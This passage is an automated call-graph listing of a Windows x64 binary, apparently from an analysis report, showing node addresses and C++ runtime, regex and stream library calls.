4869->4870 4871 7ff6c12ad56a RtlVirtualUnwind 4869->4871 4872 7ff6c12ad62a 4870->4872 4871->4870 4872->4725 4874 7ff6c12a1d9d 4873->4874 4875 7ff6c12a1e3c 4873->4875 4877 7ff6c12a1db6 4874->4877 4878 7ff6c12a1dab memmove 4874->4878 5034 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 4875->5034 4881 7ff6c12a1dc2 4877->4881 4882 7ff6c12a1df4 4877->4882 4880 7ff6c12a1e21 4878->4880 4889 7ff6c12a242c 4880->4889 5022 7ff6c12a1a70 4881->5022 4884 7ff6c12a1def memmove 4882->4884 4885 7ff6c12a1df9 4882->4885 4884->4880 5029 7ff6c12acc88 4885->5029 4890 7ff6c12a2446 4889->4890 5035 7ff6c12a2470 4890->5035 4894 7ff6c12a2402 4893->4894 4895 7ff6c12a2470 28 API calls 4894->4895 4896 7ff6c12a241b 4895->4896 4897 7ff6c12a1f10 4896->4897 4898 7ff6c12a1f40 4897->4898 4905 7ff6c12a1fef Concurrency::cancel_current_task 4897->4905 4899 7ff6c12a1f5f 4898->4899 4900 7ff6c12a1f4e memmove 4898->4900 4903 7ff6c12a1f6b 4899->4903 4899->4905 4906 7ff6c12a1f9d 4899->4906 4902 7ff6c12a1fda 4900->4902 4913 7ff6c12a60cc 4902->4913 4908 7ff6c12a1a70 2 API calls 4903->4908 5126 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 4905->5126 4906->4903 4907 7ff6c12a1fb0 4906->4907 4910 7ff6c12a1fb7 4907->4910 4911 7ff6c12a1fbc memmove 4907->4911 4909 7ff6c12a1fae 4908->4909 4909->4911 4912 7ff6c12acc88 std::_Facet_Register malloc 4910->4912 4911->4902 4912->4911 4917 7ff6c12a60f6 4913->4917 4914 7ff6c12a6193 4915 7ff6c12a61b5 4914->4915 5127 7ff6c12aa7a4 4914->5127 4915->4764 4917->4914 4919 7ff6c12a61ba 4917->4919 4918 7ff6c12a61fa 4922 7ff6c12a61e2 4918->4922 5133 7ff6c12a3620 4918->5133 4919->4918 4920 7ff6c12a61d5 4919->4920 4921 7ff6c12a627f 4920->4921 4920->4922 4925 7ff6c12a5d28 3 API calls 4921->4925 5149 7ff6c12aa6b0 4922->5149 4926 7ff6c12a63f4 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 4925->4926 4927 7ff6c12a6403 4926->4927 4927->4764 4929 7ff6c12aa2d0 4928->4929 4930 7ff6c12aa2a7 4928->4930 4929->4766 4930->4929 4931 7ff6c12aa2ef _invalid_parameter_noinfo_noreturn 4930->4931 4933 7ff6c12a23be 4932->4933 4934 7ff6c12a2470 28 API calls 4933->4934 4935 7ff6c12a23d7 4934->4935 4935->4768 4937 7ff6c12a529f ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA 4936->4937 4938 7ff6c12a52ca ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 4936->4938 4937->4938 4938->4772 4940 7ff6c12a18f0 4939->4940 5188 7ff6c12a564c 4940->5188 4942 7ff6c12a19d5 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 4946 7ff6c12a1a00 4942->4946 4947 7ff6c12a19f4 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 4942->4947 4943 7ff6c12a1974 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 4944 7ff6c12a192b 4943->4944 4945 7ff6c12a1991 4943->4945 4944->4942 4945->4942 4945->4944 4950 7ff6c12a1996 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4945->4950 4946->4781 4947->4946 4948 7ff6c12a194f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4948->4944 4949 7ff6c12a1923 4948->4949 4949->4943 4949->4944 4949->4948 4950->4944 4950->4945 4952 7ff6c12ac9dc __std_fs_code_page 2 API calls 4951->4952 4953 7ff6c12a24c9 4952->4953 5192 7ff6c12a24f8 4953->5192 4956 7ff6c12a18b4 4957 7ff6c12a18b9 4956->4957 4958 7ff6c12a564c ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 4957->4958 4966 7ff6c12a2e81 4958->4966 4959 7ff6c12a2ed6 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 4962 7ff6c12a2e89 4959->4962 4963 7ff6c12a2ec8 4959->4963 4960 7ff6c12a2f37 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 4964 7ff6c12a2f62 4960->4964 4965 7ff6c12a2f56 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 4960->4965 4961 7ff6c12a2ead ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4961->4963 4961->4966 4962->4960 4963->4960 4963->4962 4967 7ff6c12a2ef8 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4963->4967 4964->4790 4965->4964 4966->4959 4966->4961 4966->4962 4967->4962 4967->4963 4969 7ff6c12ab796 4968->4969 4970 7ff6c12ab7ce system 4969->4970 4971 7ff6c12ab7ae memmove 4969->4971 4972 7ff6c12ab7c3 4969->4972 4970->4854 4970->4855 4971->4970 5228 7ff6c12a3388 4972->5228 5243 7ff6c12aa0c0 4974->5243 4976 7ff6c12a5d7f ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 4978 7ff6c12a66f2 4977->4978 4979 7ff6c12a669d 4977->4979 4980 7ff6c12ad030 8 API calls 4978->4980 4981 7ff6c12a1d68 5 API calls 4979->4981 4982 7ff6c12a6706 4980->4982 4983 7ff6c12a66c9 memmove 4981->4983 4982->4784 4983->4978 4985 7ff6c12a1e74 4984->4985 4986 7ff6c12a1f08 4984->4986 4987 7ff6c12a1e92 4985->4987 4988 7ff6c12a1e87 memmove 4985->4988 5247 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 4986->5247 4991 7ff6c12a1e9e 4987->4991 4993 7ff6c12a1ecd 4987->4993 4990 7ff6c12a1ef3 4988->4990 4990->4784 4994 7ff6c12a1a70 2 API calls 4991->4994 4995 7ff6c12a1ed9 memmove 4993->4995 4997 7ff6c12acc88 std::_Facet_Register malloc 4993->4997 4996 7ff6c12a1ecb 4994->4996 4995->4990 4996->4995 4997->4995 4999 7ff6c12a49ec 4998->4999 5248 7ff6c12a496c 4999->5248 5003 7ff6c12a1a43 5002->5003 5004 7ff6c12a1a64 5003->5004 5005 7ff6c12a1a59 memcmp 5003->5005 5004->4784 5005->5004 5007 7ff6c12a6325 5006->5007 5009 7ff6c12a6349 5006->5009 5008 7ff6c12a6382 _invalid_parameter_noinfo_noreturn 5007->5008 5007->5009 5010 7ff6c12aa0c0 _invalid_parameter_noinfo_noreturn 5008->5010 5009->4784 5011 7ff6c12a63aa ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 5010->5011 5012 7ff6c12a63b8 5011->5012 5012->4784 5014 7ff6c12ad039 5013->5014 5015 7ff6c12ac89e 5014->5015 5016 7ff6c12ad784 IsProcessorFeaturePresent 5014->5016 5015->4865 5017 7ff6c12ad79c 5016->5017 5615 7ff6c12ad858 RtlCaptureContext 5017->5615 5023 7ff6c12a1aa5 Concurrency::cancel_current_task 5022->5023 5024 7ff6c12a1a7d 5022->5024 5025 7ff6c12acc88 std::_Facet_Register malloc 5024->5025 5026 7ff6c12a1a85 5025->5026 5027 7ff6c12a1a9e _invalid_parameter_noinfo_noreturn 5026->5027 5028 7ff6c12a1a8d 5026->5028 5027->5023 5028->4884 5030 7ff6c12acca2 malloc 5029->5030 5031 7ff6c12acc93 5030->5031 5032 7ff6c12a1dfe 5030->5032 5031->5030 5033 7ff6c12accb2 Concurrency::cancel_current_task 5031->5033 5032->4884 5040 7ff6c12ac9dc ___lc_codepage_func 5035->5040 5041 7ff6c12ac9ef AreFileApisANSI 5040->5041 5042 7ff6c12a2485 5040->5042 5041->5042 5043 7ff6c12a8198 5042->5043 5044 7ff6c12a245f 5043->5044 5045 7ff6c12a81e8 5043->5045 5044->4755 5044->4756 5044->4758 5046 7ff6c12a829b 5045->5046 5058 7ff6c12aca04 MultiByteToWideChar 5045->5058 5069 7ff6c12aa008 5046->5069 5050 7ff6c12a82a6 5051 7ff6c12aa044 24 API calls 5050->5051 5052 7ff6c12a82ae 5051->5052 5054 7ff6c12a822a 5055 7ff6c12aca04 __std_fs_convert_narrow_to_wide 2 API calls 5054->5055 5056 7ff6c12a8270 5055->5056 5056->5044 5065 7ff6c12aa044 5056->5065 5059 7ff6c12aca2e GetLastError 5058->5059 5060 7ff6c12a8212 5058->5060 5059->5060 5060->5050 5060->5054 5061 7ff6c12aa72c 5060->5061 5062 7ff6c12aa781 5061->5062 5064 7ff6c12aa74d 5061->5064 5072 7ff6c12a3a24 5062->5072 5064->5054 5066 7ff6c12aa054 5065->5066 5077 7ff6c12a5728 5066->5077 5070 7ff6c12aa018 5069->5070 5071 7ff6c12a5728 23 API calls 5070->5071 5073 7ff6c12a3ba6 5072->5073 5076 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 5073->5076 5078 7ff6c12a5776 5077->5078 5085 7ff6c12a5388 5078->5085 5081 7ff6c12ad030 8 API calls 5084 7ff6c12a57ed _CxxThrowException 5081->5084 5082 7ff6c12a57c7 _invalid_parameter_noinfo_noreturn 5083 7ff6c12a57ce 5082->5083 5083->5081 5086 7ff6c12a53cd 5085->5086 5087 7ff6c12a1e44 5 API calls 5086->5087 5088 7ff6c12a53dc 5087->5088 5097 7ff6c12a9524 5088->5097 5092 7ff6c12a5467 5094 7ff6c12ad030 8 API calls 5092->5094 5093 7ff6c12a5438 5093->5092 5095 7ff6c12a5460 _invalid_parameter_noinfo_noreturn 5093->5095 5096 7ff6c12a548d 5094->5096 5095->5092 5096->5082 5096->5083 5098 7ff6c12a9555 5097->5098 5099 7ff6c12a956a 5097->5099 5108 7ff6c12aa5bc 5098->5108 5101 7ff6c12aa5bc 8 API calls 5099->5101 5102 7ff6c12a959b 5101->5102 5103 7ff6c12a95dc memmove 5102->5103 5104 7ff6c12a95d7 5102->5104 5106 7ff6c12a95d0 _invalid_parameter_noinfo_noreturn 5102->5106 5105 7ff6c12ad030 8 API calls 5103->5105 5104->5103 5107 7ff6c12a53f5 __std_exception_copy 5105->5107 5106->5104 5107->5092 5107->5093 5109 7ff6c12aa60b 5108->5109 5111 7ff6c12a38cc 5109->5111 5112 7ff6c12a3a1e 5111->5112 5113 7ff6c12a390b 5111->5113 5114 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 5112->5114 5115 7ff6c12a391f 5113->5115 5118 7ff6c12a3961 5113->5118 5116 7ff6c12a3a23 5114->5116 5117 7ff6c12a1a70 _invalid_parameter_noinfo_noreturn malloc 5115->5117 5120 7ff6c12a395c 5117->5120 5119 7ff6c12acc88 std::_Facet_Register malloc 5118->5119 5118->5120 5119->5120 5121 7ff6c12a39e0 memmove memmove 5120->5121 5122 7ff6c12a398c memmove memmove 5120->5122 5125 7ff6c12a39cc 5121->5125 5123 7ff6c12a39b7 5122->5123 5122->5125 5124 7ff6c12a39d9 _invalid_parameter_noinfo_noreturn 5123->5124 5123->5125 5124->5121 5128 7ff6c12aa7bf memmove 5127->5128 5129 7ff6c12aa7ea 5127->5129 5132 7ff6c12aa7fd 5128->5132 5155 7ff6c12a3244 5129->5155 5132->4915 5134 7ff6c12a3660 5133->5134 5142 7ff6c12a377f Concurrency::cancel_current_task 5133->5142 5135 7ff6c12a3688 5134->5135 5138 7ff6c12a36bd 5134->5138 5134->5142 5139 7ff6c12a1a70 2 API calls 5135->5139 5138->5135 5140 7ff6c12a36d3 5138->5140 5141 7ff6c12a36ce 5139->5141 5140->5141 5145 7ff6c12acc88 std::_Facet_Register malloc 5140->5145 5143 7ff6c12a3749 memmove 5141->5143 5144 7ff6c12a36f9 memmove 5141->5144 5170 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 5142->5170 5147 7ff6c12a3735 5143->5147 5146 7ff6c12a3720 5144->5146 5144->5147 5145->5141 5146->5147 5148 7ff6c12a3742 _invalid_parameter_noinfo_noreturn 5146->5148 5147->4922 5148->5143 5150 7ff6c12aa701 5149->5150 5151 7ff6c12aa6d5 memmove 5149->5151 5171 7ff6c12a3494 5150->5171 5154 7ff6c12aa719 5151->5154 5154->4915 5159 7ff6c12a327d 5155->5159 5161 7ff6c12a337a Concurrency::cancel_current_task 5155->5161 5156 7ff6c12a329e 5160 7ff6c12a1a70 2 API calls 5156->5160 5159->5156 5159->5161 5163 7ff6c12a32e9 5159->5163 5166 7ff6c12a32e4 memmove 5160->5166 5169 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 5161->5169 5164 7ff6c12acc88 std::_Facet_Register malloc 5163->5164 5163->5166 5164->5166 5165 7ff6c12a331d 5167 7ff6c12a3373 _invalid_parameter_noinfo_noreturn 5165->5167 5168 7ff6c12a3346 5165->5168 5166->5165 5166->5168 5167->5161 5168->5132 5172 7ff6c12a34d3 5171->5172 5177 7ff6c12a3614 Concurrency::cancel_current_task 5171->5177 5173 7ff6c12a34fb 5172->5173 5176 7ff6c12a3530 5172->5176 5172->5177 5178 7ff6c12a1a70 2 API calls 5173->5178 5176->5173 5179 7ff6c12a3546 5176->5179 5187 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 5177->5187 5180 7ff6c12a3541 5178->5180 5179->5180 5181 7ff6c12acc88 std::_Facet_Register malloc 5179->5181 5182 7ff6c12a35d4 memmove memmove 5180->5182 5183 7ff6c12a357a memmove memmove 5180->5183 5181->5180 5185 7ff6c12a35c0 5182->5185 5184 7ff6c12a35ab 5183->5184 5183->5185 5184->5185 5186 7ff6c12a35cd _invalid_parameter_noinfo_noreturn 5184->5186 5185->5154 5186->5182 5189 7ff6c12a567c 5188->5189 5190 7ff6c12a56b6 5189->5190 5191 7ff6c12a569f ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 5189->5191 5190->4949 5191->5190 5193 7ff6c12a24e4 5192->5193 5194 7ff6c12a2546 5192->5194 5193->4956 5195 7ff6c12a25ee 5194->5195 5207 7ff6c12aca4c 5194->5207 5197 7ff6c12aa008 23 API calls 5195->5197 5199 7ff6c12a25f9 5197->5199 5200 7ff6c12aa044 24 API calls 5199->5200 5201 7ff6c12a2601 5200->5201 5203 7ff6c12a2584 5204 7ff6c12aca4c __std_fs_convert_wide_to_narrow 5 API calls 5203->5204 5205 7ff6c12a25c9 5204->5205 5205->5193 5206 7ff6c12aa044 24 API calls 5205->5206 5206->5195 5208 7ff6c12aca73 5207->5208 5209 7ff6c12acaca WideCharToMultiByte 5207->5209 5208->5209 5210 7ff6c12aca7b WideCharToMultiByte 5208->5210 5211 7ff6c12acafb 5209->5211 5210->5211 5216 7ff6c12a2570 5210->5216 5212 7ff6c12acaff GetLastError 5211->5212 5213 7ff6c12acb07 5211->5213 5212->5213 5214 7ff6c12acb14 WideCharToMultiByte 5213->5214 5213->5216 5215 7ff6c12acb41 GetLastError 5214->5215 5214->5216 5215->5216 5216->5199 5216->5203 5217 7ff6c12aa634 5216->5217 5218 7ff6c12aa659 memset 5217->5218 5219 7ff6c12aa68a 5217->5219 5222 7ff6c12aa69d 5218->5222 5223 7ff6c12a3bac 5219->5223 5222->5203 5224 7ff6c12a3cff 5223->5224 5227 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 5224->5227 5229 7ff6c12a348c 5228->5229 5230 7ff6c12a33bc 5228->5230 5242 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 5229->5242 5231 7ff6c12a33c9 5230->5231 5234 7ff6c12a340b 5230->5234 5235 7ff6c12a1a70 2 API calls 5231->5235 5236 7ff6c12a3406 memmove 5234->5236 5238 7ff6c12acc88 std::_Facet_Register malloc 5234->5238 5235->5236 5239 7ff6c12a3439 5236->5239 5240 7ff6c12a345e 5236->5240 5238->5236 5239->5240 5241 7ff6c12a3485 _invalid_parameter_noinfo_noreturn 5239->5241 5240->4970 5241->5229 5244 7ff6c12aa0cf 5243->5244 5246 7ff6c12aa11d 5243->5246 5245 7ff6c12aa162 _invalid_parameter_noinfo_noreturn 5244->5245 5244->5246 5246->4976 5251 7ff6c12a3d08 5248->5251 5253 7ff6c12a3f6c 5251->5253 5254 7ff6c12a3fa4 5253->5254 5260 7ff6c12a3f9d 5253->5260 5266 7ff6c12a4e34 5254->5266 5258 7ff6c12a4078 5292 7ff6c12a585c 5258->5292 5262 7ff6c12a4001 5262->5258 5263 7ff6c12a4068 5262->5263 5265 7ff6c12a3060 66 API calls 5262->5265 5282 7ff6c12a9d64 5262->5282 5264 7ff6c12a3060 66 API calls 5263->5264 5264->5258 5265->5262 5267 7ff6c12a4ed5 5266->5267 5297 7ff6c12a4254 5267->5297 5269 7ff6c12a3ff0 5270 7ff6c12a3060 5269->5270 5271 7ff6c12a3086 5270->5271 5272 7ff6c12a3098 5270->5272 5321 7ff6c12a42d8 5271->5321 5325 7ff6c12ab420 5272->5325 5275 7ff6c12a30bf 5276 7ff6c12a4254 7 API calls 5275->5276 5277 7ff6c12a30d7 5276->5277 5331 7ff6c12a9638 5277->5331 5279 7ff6c12a3114 5280 7ff6c12a42d8 5 API calls 5279->5280 5281 7ff6c12a313c 5279->5281 5280->5281 5281->5262 5283 7ff6c12a9d92 5282->5283 5286 7ff6c12a9f83 5283->5286 5287 7ff6c12a9de3 5283->5287 5288 7ff6c12a9e1b 5283->5288 5291 7ff6c12a9ebc 5283->5291 5285 7ff6c12a9ecd ?tolower@?$ctype@D@std@@QEBADD 5285->5291 5286->5287 5608 7ff6c12a1d40 5286->5608 5287->5262 5288->5287 5289 7ff6c12a9d64 11 API calls 5288->5289 5289->5288 5290 7ff6c12ab7e0 9 API calls 5290->5291 5291->5285 5291->5287 5291->5290 5296 7ff6c12a5871 5292->5296 5293 7ff6c12a5a1c _invalid_parameter_noinfo_noreturn 5295 7ff6c12a58c6 5293->5295 5294 7ff6c12a58d3 _invalid_parameter_noinfo_noreturn 5295->5294 5296->5293 5296->5294 5298 7ff6c12a4289 5297->5298 5299 7ff6c12a427c 5297->5299 5298->5299 5301 7ff6c12a44d0 5298->5301 5299->5269 5302 7ff6c12a45d1 5301->5302 5306 7ff6c12a44f9 5301->5306 5320 7ff6c12aa594 ?_Xlength_error@std@@YAXPEBD 5302->5320 5303 7ff6c12a4520 5307 7ff6c12a1a70 2 API calls 5303->5307 5305 7ff6c12a45b4 Concurrency::cancel_current_task 5314 7ff6c12a790f _invalid_parameter_noinfo_noreturn 5305->5314 5315 7ff6c12a78d9 5305->5315 5306->5303 5306->5305 5308 7ff6c12a4568 5306->5308 5312 7ff6c12a4557 5307->5312 5311 7ff6c12acc88 std::_Facet_Register malloc 5308->5311 5308->5312 5309 7ff6c12a45a5 5319 7ff6c12a26b8 memmove 5309->5319 5310 7ff6c12a459a memset 5310->5309 5311->5312 5312->5309 5312->5310 5316 7ff6c12a7918 5314->5316 5315->5299 5317 7ff6c12a7989 5316->5317 5318 7ff6c12a79c2 _invalid_parameter_noinfo_noreturn 5316->5318 5317->5299 5319->5305 5322 7ff6c12a432e 5321->5322 5324 7ff6c12a4320 5321->5324 5322->5324 5346 7ff6c12a45e0 5322->5346 5324->5272 5326 7ff6c12ab443 5325->5326 5329 7ff6c12ab476 5325->5329 5360 7ff6c12a90f4 5326->5360 5327 7ff6c12ab474 5327->5275 5329->5327 5365 7ff6c12aad18 5329->5365 5341 7ff6c12a9667 5331->5341 5332 7ff6c12a9b6b ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 5333 7ff6c12a9b13 5333->5279 5334 7ff6c12a9b55 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 5335 7ff6c12a9b60 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 5334->5335 5335->5332 5337 7ff6c12a1d40 11 API calls 5337->5341 5338 7ff6c12a9638 58 API calls 5338->5341 5341->5332 5341->5333 5341->5334 5341->5335 5341->5337 5341->5338 5345 7ff6c12a9b4e _invalid_parameter_noinfo_noreturn 5341->5345 5428 7ff6c12a20cc 5341->5428 5443 7ff6c12a1aac 5341->5443 5447 7ff6c12a8448 5341->5447 5452 7ff6c12a87bc 5341->5452 5469 7ff6c12a6048 5341->5469 5475 7ff6c12a8aa0 5341->5475 5345->5334 5347 7ff6c12a471d 5346->5347 5349 7ff6c12a4609 5346->5349 5359 7ff6c12aa594 ?_Xlength_error@std@@YAXPEBD 5347->5359 5350 7ff6c12a46a6 5349->5350 5351 7ff6c12a1a70 2 API calls 5349->5351 5353 7ff6c12a4700 Concurrency::cancel_current_task 5349->5353 5352 7ff6c12acc88 std::_Facet_Register malloc 5350->5352 5356 7ff6c12a46b0 5350->5356 5351->5349 5352->5356 5354 7ff6c12a79c2 _invalid_parameter_noinfo_noreturn 5353->5354 5355 7ff6c12a7989 5353->5355 5355->5324 5356->5356 5358 7ff6c12a26b8 memmove 5356->5358 5358->5353 5369 7ff6c12a9248 5360->5369 5362 7ff6c12a9122 5377 7ff6c12a2830 5362->5377 5366 7ff6c12aad58 5365->5366 5367 7ff6c12aae85 5366->5367 5390 7ff6c12aa444 5366->5390 5367->5327 5370 7ff6c12a9280 5369->5370 5376 7ff6c12a92b5 5369->5376 5371 7ff6c12a9375 5370->5371 5372 7ff6c12a929a 5370->5372 5388 7ff6c12aa56c ?_Xlength_error@std@@YAXPEBD 5371->5388 5381 7ff6c12a41a8 5372->5381 5376->5362 5378 7ff6c12a2852 5377->5378 5379 7ff6c12a287f 5378->5379 5380 7ff6c12a28a4 memset 5378->5380 5379->5327 5380->5379 5382 7ff6c12a41e6 5381->5382 5387 7ff6c12a41dc 5381->5387 5383 7ff6c12a4205 5382->5383 5384 7ff6c12a41f8 5382->5384 5382->5387 5386 7ff6c12a2f98 memcmp 5383->5386 5385 7ff6c12a4390 9 API calls 5384->5385 5385->5387 5386->5387 5387->5376 5389 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 5388->5389 5391 7ff6c12aa468 5390->5391 5392 7ff6c12aa4c6 5390->5392 5394 7ff6c12aa497 5391->5394 5407 7ff6c12a26b8 memmove 5391->5407 5393 7ff6c12aa56c 2 API calls 5392->5393 5397 7ff6c12aa4cb 5393->5397 5394->5367 5396 7ff6c12aa555 5397->5396 5398 7ff6c12aa52d 5397->5398 5404 7ff6c12aa4fa 5397->5404 5399 7ff6c12aa540 5398->5399 5400 7ff6c12aa536 5398->5400 5403 7ff6c12aa51d 5399->5403 5419 7ff6c12a83d0 5399->5419 5415 7ff6c12a88c0 5400->5415 5403->5367 5404->5400 5405 7ff6c12aa50e 5404->5405 5405->5396 5408 7ff6c12a838c 5405->5408 5407->5394 5409 7ff6c12a74c0 malloc 5408->5409 5410 7ff6c12a83a7 5409->5410 5411 7ff6c12a82d4 47 API calls 5410->5411 5412 7ff6c12a83b2 5411->5412 5413 7ff6c12a8ce0 malloc 5412->5413 5414 7ff6c12a8cd1 5413->5414 5414->5403 5416 7ff6c12a88db 5415->5416 5417 7ff6c12a82d4 47 API calls 5416->5417 5418 7ff6c12a88e6 5417->5418 5420 7ff6c12a757c malloc 5419->5420 5421 7ff6c12a83f3 5420->5421 5422 7ff6c12a82d4 47 API calls 5421->5422 5423 7ff6c12a83fe 5422->5423 5424 7ff6c12a8ce0 malloc 5423->5424 5425 7ff6c12a840a 5424->5425 5426 7ff6c12ab420 47 API calls 5425->5426 5427 7ff6c12a841b 5426->5427 5427->5403 5429 7ff6c12a20d5 5428->5429 5442 7ff6c12a2175 5428->5442 5430 7ff6c12a2104 5429->5430 5431 7ff6c12a2189 5429->5431 5433 7ff6c12a2122 5430->5433 5434 7ff6c12a2115 5430->5434 5504 7ff6c12aa594 ?_Xlength_error@std@@YAXPEBD 5431->5504 5437 7ff6c12acc88 std::_Facet_Register malloc 5433->5437 5438 7ff6c12a211d 5433->5438 5436 7ff6c12a1a70 2 API calls 5434->5436 5436->5438 5437->5438 5496 7ff6c12a26b8 memmove 5438->5496 5440 7ff6c12a2156 5497 7ff6c12a5adc 5440->5497 5442->5341 5444 7ff6c12a1ae1 5443->5444 5446 7ff6c12a1ae9 5443->5446 5514 7ff6c12a7f14 5444->5514 5446->5341 5448 7ff6c12a8484 ?tolower@?$ctype@D@std@@QEBADD 5447->5448 5449 7ff6c12a8497 5447->5449 5448->5449 5451 7ff6c12a84bd 5449->5451 5528 7ff6c12ab7e0 5449->5528 5451->5341 5534 7ff6c12a5010 5452->5534 5454 7ff6c12a6048 49 API calls 5459 7ff6c12a87eb 5454->5459 5455 7ff6c12a5a1c _invalid_parameter_noinfo_noreturn 5456 7ff6c12a88a0 5455->5456 5456->5341 5457 7ff6c12a9638 62 API calls 5457->5459 5458 7ff6c12a8818 5460 7ff6c12a8816 5458->5460 5461 7ff6c12a5010 9 API calls 5458->5461 5459->5454 5459->5457 5459->5458 5459->5460 5460->5455 5468 7ff6c12a8831 5461->5468 5462 7ff6c12a887f 5463 7ff6c12a6048 49 API calls 5462->5463 5465 7ff6c12a8889 5463->5465 5464 7ff6c12a6048 49 API calls 5464->5468 5539 7ff6c12a5a1c 5465->5539 5467 7ff6c12a9638 62 API calls 5467->5468 5468->5462 5468->5464 5468->5467 5470 7ff6c12a608b 5469->5470 5471 7ff6c12a6075 5469->5471 5472 7ff6c12a60b3 5470->5472 5559 7ff6c12a1b48 5470->5559 5473 7ff6c12a1aac 4 API calls 5471->5473 5472->5341 5473->5470 5476 7ff6c12a8ace 5475->5476 5477 7ff6c12a8ad8 5475->5477 5585 7ff6c12a8904 5476->5585 5478 7ff6c12a5010 9 API calls 5477->5478 5480 7ff6c12a8ae8 5478->5480 5481 7ff6c12a8b32 5480->5481 5482 7ff6c12a8b80 5480->5482 5483 7ff6c12a8b55 5480->5483 5485 7ff6c12a9638 62 API calls 5481->5485 5484 7ff6c12a8ba0 5482->5484 5487 7ff6c12a9638 62 API calls 5482->5487 5486 7ff6c12a9638 62 API calls 5483->5486 5488 7ff6c12a8bd7 5484->5488 5489 7ff6c12a8beb 5484->5489 5493 7ff6c12a6048 49 API calls 5484->5493 5485->5488 5491 7ff6c12a8b65 5486->5491 5487->5484 5488->5489 5490 7ff6c12a6048 49 API calls 5488->5490 5492 7ff6c12a5a1c _invalid_parameter_noinfo_noreturn 5489->5492 5490->5489 5491->5488 5491->5489 5494 7ff6c12a6048 49 API calls 5491->5494 5495 7ff6c12a8ad3 5492->5495 5493->5481 5494->5481 5495->5341 5496->5440 5498 7ff6c12a5aea 5497->5498 5499 7ff6c12a5b1b 5497->5499 5498->5499 5500 7ff6c12a5b37 _invalid_parameter_noinfo_noreturn 5498->5500 5499->5442 5501 7ff6c12a5b51 5500->5501 5502 7ff6c12a5b4c 5500->5502 5501->5442 5505 7ff6c12aa16c 5502->5505 5506 7ff6c12aa186 5505->5506 5511 7ff6c12aa1e8 5505->5511 5507 7ff6c12aa19d 5506->5507 5508 7ff6c12a5dac _invalid_parameter_noinfo_noreturn 5506->5508 5509 7ff6c12aa211 _invalid_parameter_noinfo_noreturn 5507->5509 5507->5511 5508->5506 5510 7ff6c12aa229 5509->5510 5512 7ff6c12aa271 5509->5512 5510->5512 5513 7ff6c12aa28d _invalid_parameter_noinfo_noreturn 5510->5513 5511->5501 5512->5501 5515 7ff6c12a8003 Concurrency::cancel_current_task 5514->5515 5517 7ff6c12a7f41 5514->5517 5527 7ff6c12aa594 ?_Xlength_error@std@@YAXPEBD 5515->5527 5519 7ff6c12a7f99 5517->5519 5521 7ff6c12a7fc8 _invalid_parameter_noinfo_noreturn 5517->5521 5519->5515 5520 7ff6c12a7fb1 5519->5520 5522 7ff6c12a7fcf 5520->5522 5523 7ff6c12a7fbe 5520->5523 5521->5522 5524 7ff6c12a7fc6 5522->5524 5526 7ff6c12acc88 std::_Facet_Register malloc 5522->5526 5525 7ff6c12a1a70 2 API calls 5523->5525 5524->5446 5525->5524 5526->5524 5530 7ff6c12ab811 5528->5530 5529 7ff6c12ab869 5531 7ff6c12ad030 8 API calls 5529->5531 5530->5529 5532 7ff6c12ab862 _invalid_parameter_noinfo_noreturn 5530->5532 5533 7ff6c12ab87d 5531->5533 5532->5529 5533->5451 5535 7ff6c12a20cc 8 API calls 5534->5535 5536 7ff6c12a5060 5535->5536 5544 7ff6c12a2190 5536->5544 5540 7ff6c12a5a2e 5539->5540 5541 7ff6c12a5abd _invalid_parameter_noinfo_noreturn 5540->5541 5542 7ff6c12a5aa0 5540->5542 5543 7ff6c12a5ad0 5541->5543 5542->5460 5543->5460 5545 7ff6c12a2199 5544->5545 5558 7ff6c12a2237 5544->5558 5546 7ff6c12a224b 5545->5546 5547 7ff6c12a21cb 5545->5547 5548 7ff6c12aa594 ?_Xlength_error@std@@YAXPEBD 5546->5548 5549 7ff6c12a21d8 5547->5549 5552 7ff6c12a21e5 5547->5552 5550 7ff6c12a2250 5548->5550 5551 7ff6c12a1a70 _invalid_parameter_noinfo_noreturn malloc 5549->5551 5554 7ff6c12a21e0 5551->5554 5553 7ff6c12acc88 std::_Facet_Register malloc 5552->5553 5552->5554 5553->5554 5555 7ff6c12a26b8 memmove 5554->5555 5556 7ff6c12a2219 5555->5556 5557 7ff6c12a5b58 _invalid_parameter_noinfo_noreturn _invalid_parameter_noinfo_noreturn 5556->5557 5557->5558 5558->5459 5560 7ff6c12a1b7d 